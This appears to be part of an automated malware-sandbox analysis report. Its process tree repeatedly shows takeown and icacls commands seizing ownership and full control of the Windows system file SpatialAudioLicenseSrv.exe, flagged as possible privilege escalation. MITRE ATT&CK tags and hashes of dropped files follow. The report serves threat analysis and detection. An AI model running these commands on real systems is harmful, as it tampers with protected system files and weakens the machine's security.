C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5284
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5616
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:6036 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5924
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:1264 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2612
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5448
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:2176
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5604
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:5132 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5608
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5492
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:1404 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5052 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3608
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:4492
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4056 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Possible privilege escalation attempt
PID:1796 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5408
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Possible privilege escalation attempt
PID:5452 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3960
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:2656 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:3368
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3052
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:3088
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5560
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5832
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:6080 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4072
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:3932
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:6056 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5188
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5628
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5932
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4692 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:4816
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4444 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:4908
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5400
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5296
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5984
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Possible privilege escalation attempt
PID:5416 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:5312 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5844
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:5740 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6104
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:5276 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5124
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2120
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:4440 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5612 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5532
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1640
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:1148
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5472 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1960
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:5396 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5388
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:4432
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1140
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2320
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:1884
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5232
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:5588 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1804
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4372 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6092
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:4488
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4468 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:5868 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:3192 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5892
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:4832 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Possible privilege escalation attempt
PID:5184 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2932
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5136
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:436
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3664 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:5872 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5952
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:32
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5444
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:956 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3444
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5912
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5384 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵PID:5436
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4508
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5800 -
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZTSLLRFH /U Admin /F "C:\Windows\System32\SpatialAudioLicenseSrv.exe"2⤵
- Modifies file permissions
PID:3544 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\SpatialAudioLicenseSrv.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:2808
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Event Triggered Execution
1Change Default File Association
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
574KB
MD54e4d06b6b8b4894dc2fcff09f3614acc
SHA10bca7ad4d18fa88584e3178db684be5479c73db9
SHA256d0c6402a35b68b7b26eb7e3aead298d49b62ad25dc56221e28ab8ae880ee19a5
SHA512ce3650d26b63045cea02ff21cd3e4e2049ef1f6640b0a94d3acd4e5122f57f1882a195cb2e24bc774062a5d566f0ec888344fb865aeb6ede99844159d4e728ff
-
Filesize
574KB
MD520b8318cb790424c19f1c88de164e7f2
SHA115ba100d3d7b2d6c5fa12a75b2650453d6f0fdf5
SHA256b8ec1b2c5836eec20a3c9339fb16273ac03d21817b490ec795964d7cbdf9f212
SHA5120296285e514e9ff16a09dd991fd3c91a4326f1fea542e3c1bbfaca32c6a3765307317faaa7e422a2820ba24da9cb19d437cf59e34dc16ca4d9a5dffe5df6eac7
-
Filesize
574KB
MD5a7d9f4177a38a6c2c1144ade6c6fb16d
SHA1d172a4986e451409dfac1cb634cb10e578fec77b
SHA25660f98f653013a865205f95b9458fc14b5149c1cda4b3b79f90590740cb312723
SHA512bebfe1af970c6a3bd4ea050177258ad09c2e619e23fe08c181775ae615222368055e23738571ec92d4292828eaddff209de81001952d1f1f5614e8d3ea2da456
-
Filesize
574KB
MD5164cfd4f73f51d210c8cf6c1442b6d3f
SHA1286b3d6732e7092b647ae361e36e489532e322e6
SHA256721ad4398c57e680166c255625d9d7b71a564194e543deaae2f332d5601204bd
SHA51247452a6b40cd234935c53b45d80cf71bb50021d6660ec814960138317072054c8d84e4509927891da79de2240b4a4402108ee65240cb7608e148ad0d600d0a95
-
Filesize
128KB
MD53e86ce906642c6791ee9d7abc5978127
SHA196114aeac8221a53f131eade5230875c1747fe12
SHA25636d23a696b25666ddc3c4e665e489ee2803a9d65aee13178d558e57f1255d263
SHA51233dce42d52380774ff082c8726ef08281ca6bdc2624d0bded0285494ed2a7f3f2cfc43dc41f1f4df903aa3dc649e55735da2bd93523d14dbbbbde5af43ef1aab